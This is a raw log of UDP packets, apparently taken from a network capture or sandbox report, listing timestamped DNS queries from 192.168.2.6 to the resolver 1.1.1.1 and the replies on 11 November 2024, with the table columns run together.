                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.893820047 CET6049153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894042969 CET6153653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894665003 CET6315153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894685984 CET5462353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.895222902 CET6036053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.895507097 CET5675453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896193981 CET5181553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896730900 CET53617711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896756887 CET5910353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896922112 CET6029553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.897583961 CET6424253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.897785902 CET5477453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898298979 CET5899553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898662090 CET6072553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898713112 CET53521611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898827076 CET6414153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.899187088 CET53527701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.899715900 CET6242653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.901520014 CET53509651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.903327942 CET5828853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.903650045 CET5721953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.903784990 CET53615361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.904038906 CET53604911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.904905081 CET53631511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.905184031 CET53546231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.905195951 CET53620641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.905571938 CET53603601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.906688929 CET53528751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.906871080 CET53518151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.907713890 CET53547741.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.908519030 CET53607251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.908833027 CET53641411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.908890963 CET53642421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.908945084 CET53589951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.911853075 CET6217053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.912892103 CET53582881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.913038015 CET53572191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.927376986 CET53591031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.927464008 CET53567541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.930103064 CET53602951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.930773020 CET53624261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.943495035 CET53621701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.215666056 CET6139853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.248593092 CET53613981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255040884 CET6340753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255260944 CET5105053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255413055 CET6209353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255559921 CET5200153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255709887 CET5530353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255865097 CET5476353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255995035 CET5883553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256134033 CET5541553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256274939 CET5892153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256417036 CET5007053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256548882 CET6504753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256777048 CET5962453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.257107019 CET4931453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.257570982 CET6426753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.260605097 CET6086353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.265357018 CET53547631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.266019106 CET53553031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.266071081 CET53589211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.266575098 CET53588351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.266694069 CET53554151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.268105030 CET53596241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.268146038 CET53500701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.269157887 CET53642671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.287734032 CET53634071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.288191080 CET5400553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.288360119 CET53520011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.288419008 CET53510501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.289164066 CET53620931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.289174080 CET53650471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.289589882 CET53493141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291335106 CET5526353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291459084 CET5953153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291595936 CET5130153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291686058 CET6074853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291990042 CET6337253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.292171955 CET5843853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.292325020 CET5798753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.292578936 CET5883153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.292706013 CET5845953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.293225050 CET5311753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.293478012 CET5189753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.293653965 CET5541153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.299757957 CET53540051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.299907923 CET53607481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.301799059 CET6032353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.301966906 CET5350253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302203894 CET6468453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302457094 CET5649453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302603006 CET5177153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302651882 CET5633553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302803040 CET6257753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302858114 CET5598353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302994013 CET5999753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.305392027 CET53633721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.305402994 CET53579871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.305505991 CET53552631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.305519104 CET53595311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.305548906 CET53588311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.305561066 CET53531171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.305569887 CET53584591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.311836958 CET53564941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.312335968 CET53535021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.313112974 CET53554111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.313292027 CET53625771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.313674927 CET53599971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.313740969 CET53563351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.314313889 CET53559831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.315474987 CET53646841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.316663980 CET53518971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.319021940 CET5598553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.319180012 CET6238053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.319345951 CET5942453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.319506884 CET5924253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.319665909 CET5933653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.323133945 CET53584381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.324251890 CET53513011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.329006910 CET53559851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.330892086 CET53593361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.331176996 CET53594241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.331250906 CET53592421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.332663059 CET53603231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.332917929 CET53517711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.351058006 CET53623801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.394109964 CET53608631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.594654083 CET6382353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.743906021 CET53638231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.969789028 CET5814453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.972019911 CET5138353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.974755049 CET5556853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.979624033 CET5880353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.982013941 CET53513831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.985287905 CET5099153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.985800028 CET53555681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.987158060 CET5955753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.987921953 CET5017653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.988287926 CET5701753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.988682032 CET5188253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.989121914 CET5160353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.989191055 CET4965553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.989551067 CET6153553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.990243912 CET5583153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.990411997 CET5201753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.990763903 CET5456753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.991035938 CET5234453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.991497993 CET5067253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.992016077 CET6414653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.992156982 CET6136553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.993199110 CET5397853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.993808985 CET6370253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.993999958 CET6374553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.994533062 CET5806453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.994709015 CET5498053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.995237112 CET5368253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.995263100 CET53509911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.995330095 CET5938953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.998888016 CET53595571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.999064922 CET53570171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.999603033 CET5796753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.999867916 CET6105253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.000200033 CET4958553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.000263929 CET53615351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.000413895 CET53641461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.002039909 CET5279653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.003237963 CET5349053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.003243923 CET53581441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.004513979 CET53613651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.005705118 CET53637451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.006298065 CET53536821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.006354094 CET53593891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.006767988 CET53496551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.007708073 CET5502353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.008805037 CET53523441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011715889 CET53588031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011728048 CET53579671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011738062 CET53495851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011775017 CET53534901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011785984 CET53610521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011840105 CET53527961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.012438059 CET53539781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.012691975 CET5344153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.013333082 CET53549801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.019654036 CET5688153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.019747972 CET53501761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.020423889 CET53516031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.020639896 CET53518821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.021332979 CET53558311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.022628069 CET53520171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.023792982 CET53534411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.023983002 CET53545671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.023993015 CET53506721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.025002956 CET6528553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.025743008 CET53550231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.025907993 CET53637021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.026726007 CET6234053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.026793957 CET53580641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.029234886 CET53568811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.045886993 CET53623401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.053524971 CET5110653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.055414915 CET6485853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.056747913 CET53652851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.063158035 CET53511061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.065691948 CET53648581.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.258965969 CET5046453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.260139942 CET5102453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.260448933 CET5377053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.260950089 CET5280753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.261347055 CET6044453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.261627913 CET5028453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.261826038 CET6082053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262181044 CET5135753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262254000 CET5095553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262562990 CET4956153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262741089 CET5997653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.263015985 CET5621253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.264542103 CET6176753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265055895 CET5246053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265445948 CET5832053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265610933 CET5940453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265939951 CET6345953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.270553112 CET53504641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.271038055 CET53537701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.272665024 CET5929353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.272712946 CET53502841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.272785902 CET53604441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.273025036 CET5252253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.274270058 CET53599761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.274290085 CET53509551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.275070906 CET6112253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.276149035 CET5933853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277559042 CET53562121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277570963 CET53634591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277580976 CET53524601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277591944 CET53583201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.281517982 CET53513571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.285053968 CET53594041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.286583900 CET53593381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.291054964 CET53510241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.291460037 CET53528071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.293652058 CET53608201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.293926001 CET53495611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.294855118 CET53617671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.304225922 CET53592931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.304832935 CET53525221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.307132006 CET53611221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.507536888 CET5638253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.509537935 CET6526253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.518379927 CET53563821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.541362047 CET53652621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.106549978 CET6235653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.108784914 CET5315353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.108943939 CET5360853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.114473104 CET53623561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.120558023 CET53531531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.139820099 CET53536081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.292850018 CET5846453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.293374062 CET6407753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.293946028 CET5867653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.294572115 CET5152653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.299303055 CET5864553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.300406933 CET53584641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.300474882 CET5170453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.300822020 CET5340753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.301237106 CET5818553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.301476002 CET5525153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.301819086 CET5912453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.302259922 CET5779353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.304189920 CET53586761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.304255009 CET6498753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.304517031 CET53640771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.308413982 CET53586451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.310313940 CET53517041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.311157942 CET53552511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.311388016 CET53534071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.311510086 CET53591241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.311731100 CET53581851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.311886072 CET53577931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.313364983 CET53649871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.318511963 CET6378753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.320471048 CET5213153192.168.2.61.1.1.1
